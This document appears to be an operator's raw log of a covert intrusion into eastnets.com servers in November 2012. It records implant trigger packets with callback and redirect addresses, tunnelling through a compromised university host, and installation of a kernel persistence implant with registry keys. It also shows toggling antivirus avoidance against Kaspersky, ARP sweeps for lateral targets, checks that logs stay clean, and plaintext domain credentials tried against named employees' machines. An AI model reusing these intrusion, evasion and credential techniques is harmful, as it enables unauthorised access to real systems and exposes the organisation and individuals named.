ISP: LK
City:
Phone:
ISP IP: 65.218.69.150
Source IP:
FINAL target IP:
Ops Machine: LOCALHOST.LOCALDOMAIN
Redirecting Method 1: INCISION
Redirect Host 1: 192.168.1.3
Redirect Target 1: 10.10.10.180
BEGIN UNIX OPNOTES:
Targets (IP, full domain name, target tags: pitchimpair unsuccessful not_attempted ) :
---> 202.145.16.4 sunblade.kouku-dai.ac.jp pitchimpair unix successful
---> 192.168.1.3 endxbmail001.eastnets.com jeepflea_market windows successful
----> 10.10.10.180 store.eastnets.com jeepflea_market windows successful
---> 10.10.10.90 endzr-ard.eastnets.com jeepflea_market windows successful
Ops Machine: WO
Results:
PROJECT=JEEPFLEA_MARKET
OPUSER=57728
OPSCHEDULE=12110110015132
SCRUBVER=6.006000035
======================= P0
--- 202.145.16.4 --- sunblade
=======================
2012-11-07 05:15:23 UTC ourtn -wBIN -eY5U /current/up/noserver 202.145.16.4
2012-11-07 05:15:38 UTC on target
2012-11-07 05:16:00 UTC Uptime: 37 day(s), 5:45:14
2012-11-07 05:17:04 UTC logs are clean
2012-11-07 05:17:28 UTC setting up tunnels
-rawsend 444
-tunnel
r 443 192.168.254.72
r 31219 192.168.254.72
2012-11-07 10:11:55 UTC tunnels down
2012-11-07 10:12:45 UTC logs clean
2012-11-07 10:13:12 UTC of target
LOCALHOST.LOCALDOMAIN: scrubhands v. 6.006000035 20121107-0505
###################
SCRUBHANDS v6.006000035 (suite v6.6.0.35 run in /192.168.254.71) command line:
:
/usr/local/bin/scrubhands -t -S 12110110015132 -I 57728 -P JEEPFLEA_MARKET -n 198.6.1.3 65.218.69.150/224/129
###################
Final lines of bwmonitor.txt:
Wed Nov 7 10:13:19 UTC 2012
RX packets:50189 errors:0 dropped:0 overruns:0 frame:0
RX bytes:39381614 (37.5 MiB) TX bytes:8780195 (8.3 MiB)
###################################################
Project: JEEPFLEA_MARKET
Date: 5:13 AM 11/7/2012
### Lines to assist in automated processing
# Un-comment the "Op Status" line (the line immediately below this one) to mark this op as unsuccessful
#Op Status: Unsuccessful
# Un-comment the "Non-Standard" line (the line immediately below this one) to mark this op as a non-standard
#Non-Standard: True
###################################################
Targets:
Results:
======================= T1
--- 192.168.1.3 --- endxbmail001
=======================
Trigger: SUCCESSFUL - please update IN NEXT OPPLAN
----====**** CORDIALFLIMSY TRIGGER BEGIN ****====----
Target Address : 213.132.40.101
Source Address : 202.145.16.4
Target Protocol : TCP
Target Dst Port : 110
Target Src Port : 3054
TCP Flags : 0x02
Keyfile : D:\DSZOPSDisk\Resources\Pc\Keys\jeepflea_market\private_key.bin
Callback Address : 202.145.16.4
Callback Dst Port : 443
Callback Src Port : 0
Redirect through : 192.168.254.71:444
Final Destination : 192.168.1.3
Id : 0x0000000100011bd2
Packet Trailer : 0x4a11
----====**** CORDIALFLIMSY TRIGGER END ****====----
5:21 AM 11/7/2012 trigger sent - no callback
5:28 AM 11/7/2012 retriggered with no CB source port - nope
5:32 AM 11/7/2012 retrigger with the updated PCID
5:35 AM 11/7/2012 CALLBACK RECV
5:35 AM 11/7/2012 WIN2K3 SP 2
5:36 AM 11/7/2012 PSP installed - Kaspersky Endpoint Security 8 for Windows
| Kaspersky Endpoint Security 8 for Windows | 8.1.0.831 | Kaspersky Lab | 2012-08-06 |
| Kaspersky Security Center Network Agent | 9.2.69 | Kaspersky Lab | |
5:38 AM 11/7/2012 Uptime: 18 days, 13 hours, 30 minutes, 21 seconds
Idle : 0 days, 0 hours, 4 minutes, 54 seconds
5:39 AM 11/7/2012 Auditing:ON
AuditCategorySystem - Success Failure
AuditCategoryLogon -
AuditCategoryObjectAccess - Success Failure
AuditCategoryPrivilegeUse - Success Failure
AuditCategoryDetailedTracking -
AuditCategoryPolicyChange - Success Failure
AuditCategoryAccountManagement - Success Failure
AuditCategoryDirectoryServiceAccess - Success Failure
AuditCategoryAccountLogon - Success Failure
5:41 AM 11/7/2012 logs are clean
dir -mask * -path * -recursive -max 0 -age 15m
5:53 AM 11/7/2012 NO ZB because of PSP
5:54 AM 11/7/2012 Redirect to target 2
monitor packetredirect -listenport 444
imr 127.0.0.1 2143 2143
8:38 AM 11/7/2012 logs are clean
8:40 AM 11/7/2012 off target
======================= T2
--- 10.10.10.180 --- store
=======================
6:03 AM 11/7/2012 trigger sent - success
----====**** CORDIALFLIMSY TRIGGER END ****====----
Client Version: 2.1.0 (Nov 7 2011 16:44:14)
----====**** CORDIALFLIMSY TRIGGER BEGIN ****====----
Target Address : 10.10.10.180
Source Address : 192.168.1.3
Target Protocol : ICMP
ICMP type,code : 8,0
Keyfile : D:\DSZOPSDisk\Resources\Pc\Keys\jeepflea_market\private_key.bin
Callback Address : 192.168.1.3
Callback Dst Port : 2143
Callback Src Port : 0
Redirect through : 127.0.0.1:444
Final Destination : 10.10.10.180
Id : 0x0000000100010a85
Packet Trailer : 0x61ae
----====**** CORDIALFLIMSY TRIGGER END ****====----
6:09 AM 11/7/2012 OS: Win2k3 SP2 32bit
6:09 AM 11/7/2012 PSP: Kaspersky Anti-Virus 8.0 for Windows - not comm with cloud
** has been updated
| Kaspersky Endpoint Security 8 for Windows | 8.1.0.831 | Kaspersky Lab | 2012-08-01 |
| Kaspersky Security Center Network Agent | 9.2.69 | Kaspersky Lab | |
** sad face
| -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
| THIS VERSION APPEARS TO BE UNSUPPORTED. PLEASE HARASS THOSE RESPONSIBLE.
| -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
6:10 AM 11/7/2012b Uptime: 85 days, 1 hours, 39 minutes, 32 seconds
Idle : 0 days, 0 hours, 20 minutes, 4 seconds
6:12 AM 11/7/2012 Procs previously seen... not a threat
- | 2076 | 524 | C:\WINDOWS\system32 | mapsvc.exe | NT AUTHORITY\SYSTEM | 2012-06-14 | |
- | 2096 | 524 | C:\WINDOWS\system32 | nfssvc.exe | NT AUTHORITY\SYSTEM | 2012-06-14 | |
6:14 AM 11/7/2012 Auditing:ON - not dorked
6:22 AM 11/7/2012 conficker still on target
6:18 AM 11/7/2012 checking logs - we are clean
dir -mask * -path * -recursive -max 0 -age 15m
6:38 AM 11/7/2012 need to upgrade to FLAV w/KISU and SOLARTIME
1) install PC KISU w/ FLAV
PCID = 0x100011ee9
KISU = Installing pc (0x7a43e1fa)
Version: 2.2.0.5
Kernel Module Loader:
Registry Key: \registry\machine\SYSTEM\CurrentControlSet\Services\QDLTx32\Parameters
Registry Value: {57866E4E-885E-C4AC-1AEA-4F8DA7C95D91}
User Module Loader:
Registry Key:
Registry Value:
Module Store Directory:
Registry Key: \registry\machine\SYSTEM\CurrentControlSet\Services\CipcCdp\Parameters
Registry Value: {3983D697-20B0-B301-BD80-38DFDA93C8D0}
Launcher:
Service Name: SMBios
Registry Value: {57866E4E-885E-C4AC-1AEA-4F8DA7C95D91}
Persistence:
Method: SOTI
Module Id Size Order Flags Name Process
=====================================================================
0xbb397f32 62464 0 U EC UserModuleLoader 32-Bit
0xbb397f34 20 0 ECL Persistence Identifier
0xd0000102 171520 1 B D EC ntevt
0xd0000100 87552 1 A U EC true services.exe
B: BootStart, S: SystemStart, A: AutoStart, D: KernelDriver
U: UserMode, R: SystemMode, K: ServiceKey, E: Encrypted
C: Compressed, L: DemandLoad, O: AutoStart Once
7:14 AM 11/7/2012 flav install test ... WOW it worked.
7:21 AM 11/7/2012 we got knocked off the original connection... seems to be ok.
7:26 AM 11/7/2012 psp_avoidance -enable
- --------------------------------
- PSP Avoidance changes: SUCCEEDED
- --------------------------------
7:27 AM 11/7/2012 removing old PC and DMGZ - delete failed needed to pfroadd
pfroadd c:\windows\System32\wship.dll
7:31 AM 11/7/2012 psp_avoidance -disabled
- --------------------------------
- PSP Avoidance changes: SUCCEEDED
- --------------------------------
7:35 AM 11/7/2012 Run a netmap to find targets of interest
** Want Sanam Mirchandi if possible, otherwise just an additional UR in the 10.10.10.X subnet
scansweep -type arp -target 10.10.10.1-10.10.10.254 -period 3s-7s
7:36 AM 11/7/2012 ** TARGETS UP **
Internet Address State/Type Physical Address Interface
-----------------------------------------------------------------------------------
10.10.10.10 Dynamic 00-0C-29-45-41-EB 10.10.10.180
10.10.10.49 Dynamic 00-1D-BA-F7-EF-DE 10.10.10.180
10.10.10.52 Dynamic 00-16-EA-CA-CD-14 10.10.10.180
10.10.10.55 Dynamic 00-26-C6-38-98-30 10.10.10.180
10.10.10.56 Dynamic 00-22-FA-98-30-5C 10.10.10.180
10.10.10.60 Dynamic 00-1D-72-5D-B5-18 10.10.10.180
10.10.10.70 Dynamic 00-13-E8-CB-55-75 10.10.10.180
10.10.10.86 Dynamic 00-21-5D-46-D9-3C 10.10.10.180
10.10.10.94 Dynamic E8-39-DF-1B-19-AA 10.10.10.180
10.10.10.95 Dynamic 00-16-EA-BB-A2-84 10.10.10.180
10.10.10.104 Dynamic 00-1E-65-B2-4C-EA 10.10.10.180
10.10.10.124 Dynamic 00-27-13-B3-CA-AA 10.10.10.180
10.10.10.134 Dynamic 5C-26-0A-5D-95-83 10.10.10.180
10.10.10.147 Dynamic 00-21-5D-45-CE-82 10.10.10.180
10.10.10.151 Dynamic 00-21-6A-7F-13-66 10.10.10.180
10.10.10.161 Dynamic 5C-26-0A-5D-96-14 10.10.10.180
10.10.10.230 Dynamic 00-1F-12-25-AB-05 10.10.10.180
7:37 AM 11/7/2012 scanning up 10.10.10.151 - ragarwal
NativeOS: Windows 7 Professional 7600
NativeLanMan: Windows 7 Professional 6.1
7:51 AM 11/7/2012 the old creds failed ....
dubai-admin dxbr00t
dubai-admin dxbr00t$$
ragarwal ashima2 - local
** trying creds updated on 10.10.10.151 - shares = nope
8:00 AM 11/7/2012 scanning 10.10.10.55 - dabbagh
NativeOS: Windows 7 Enterprise 7601 Service Pack 1
NativeLanMan: Windows 7 Enterprise 6.1
** trying creds on 10.10.10.55
creds tried: dubai-admin dxbr00t$$
dir \\10.10.10.55\c$\progra~1\Microsoft Forefront UAG\Endpoint Components\3.1.0\
Windows Defender
exploit? ** nope **
8:08 AM 11/7/2012 scanning up 10.10.10.70 - sanam
NativeOS: Windows 7 Ultimate N 7601 Service Pack 1
NativeLanMan: Windows 7 Ultimate N 6.1
shares -target 10.10.10.70 -map IPC$ -credentials dubai-admin dxbr00t$$ EASTNETS
dir \\10.10.10.70\c$\progra~1\
Kaspersky Anti-Virus 6.0 for Windows Workstations MP4
Windows Defender
exploit? **nope**
8:38 AM 11/7/2012 checking the logs... clean
8:39 AM 11/7/2012 off target
======================= T3
--- 10.10.10.90 --- ENDXB-ARD
=======================
9:16 AM 11/7/2012 callback recv
9:16 AM 11/7/2012 Uptime: 1 days, 2 hours, 11 minutes, 43 seconds
Idle : 1 days, 15 hours, 51 minutes, 38 seconds
9:17 AM 11/7/2012 PSP Kaspersky 6.0
| Kaspersky Anti-Virus 6.0 for Windows Workstations | 6.0.4.1212 | Kaspersky Lab
PRODUCT NAME: Kaspersky Anti-Virus 6.0 for Windows Workstations
VERSION: 6.0.4.1212
9:18 AM 11/7/2012 new proc - Adobe Acrobat
- | 748 | 820 | C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat | AcroBroker.exe | EASTNETS\ADesear | 2012-11-07 |
9:24 AM 11/7/2012 Uptime: 1 days, 2 hours, 11 minutes, 43 seconds
Idle : 1 days, 15 hours, 51 minutes, 38 seconds
9:27 AM 11/7/2012 did not dork auditing
9:41 AM 11/7/2012 Memory Load : 68%%
9:45 AM 11/7/2012 firewall Status: Disabled
10:09 AM 11/7/2012 downloaded tasking (~20MB)
10:09 AM 11/7/2012 off target
####
# Lines to assist in techsums
# NOTEs and ERRORs will automatically generate a techsum
# You can also enclose any portion of your opnotes in a block to have that section be included in the
# techsum automatically. Like so:
#
# Bad things happened.
# Then more bad things happened.
# Then it _really_ got bad.
#
# Please keep the and on separate lines
# Um...also, those angle brackets (< and >) are actually there, unlike the formats below
####
###################################################
#
# Create lines like the following (without #) to create targetnotes files
# Targetnotes files are found in the directory as targetnotes.txt; you can also create them directly.
# They will be read to automate actions in future ops.
#
# General note to operators
#NOTE ():
#
# Do not run this command (it will cause problems on this box)
#DONOTRUN ():
#
# This command caused an error (bring it to the attention of the developer)
#ERROR ():
#
# This process runs all the time and is harmless
#IGNORE ():
#
# This process was identified
#ID: =